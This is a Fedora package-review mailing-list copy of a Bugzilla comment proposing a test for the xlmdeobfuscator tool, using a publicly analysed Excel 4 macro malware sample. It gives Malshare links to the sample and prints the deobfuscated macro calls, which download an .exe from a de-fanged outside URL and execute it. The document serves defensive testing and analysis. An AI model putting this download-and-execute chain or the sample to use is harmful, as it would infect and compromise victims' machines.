https://bugzilla.redhat.com/show_bug.cgi?id=2245786
--- Comment #6 from Michal Ambroz <[email protected]> --- As this is really specific tool here I proposed test case to test that the tool does what it is supposed to do. (BEWARE!!!) It is using real malware for test, so handle with care. Download of the second stage is not active now, but still I am de-fanging the malicious URL in the example bellow. Test1 based on Dider Stevens diary https://isc.sans.edu/diary/Excel+4+Macro+Analysis+XLMMacroDeobfuscator/26110 1) download malware sample from Malshare (need to register) https://malshare.com/sample.php?action=detail&hash=0be6ece31de89f3efb4125e086416ffc https://malshare.com/sampleshare.php?action=getfile&hash=01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606 2) (OPTIONAL) check that it really contains the obfuscated code in the worksheet cells (using the DidierStevensSuite) This step is optional as this particular sample IS obfuscated and was already publicly analyzed $ zipdump.py -s 5 -d 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606.xlsx |xmldump.py celltext| grep -e CALL BC1986,"CALL($EB$661,$AE$429,$FK$1459,0,$BB$54,$CB$1256,0,0)",0 BC1987,"CALL($BO$1913,$GM$1203,$CF$742,0,$IO$1228,$GC$1642,,0,0)",0 3) check that the xlmdeobfuscator really gives the deobfuscated value $ xlmdeobfuscator -f 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606.xlsx | grep -e CALL CELL:BC1986 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://service.pandtelectric[.]com/fattura.exe","C:\ProgramData\jeTneVi.exe",0,0) CELL:BC1987 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\jeTneVi.exe",,0,0) -- You are receiving this mail because: You are on the CC list for the bug. You are always notified about changes to this product and component https://bugzilla.redhat.com/show_bug.cgi?id=2245786 Report this comment as SPAM: https://bugzilla.redhat.com/enter_bug.cgi?product=Bugzilla&format=report-spam&short_desc=Report%20of%20Bug%202245786%23c6 _______________________________________________ package-review mailing list -- [email protected] To unsubscribe send an email to [email protected] Fedora Code of Conduct: https://docs.fedoraproject.org/en-US/project/code-of-conduct/ List Guidelines: https://fedoraproject.org/wiki/Mailing_list_guidelines List Archives: https://lists.fedoraproject.org/archives/list/[email protected] Do not reply to spam, report it: https://pagure.io/fedora-infrastructure/new_issue
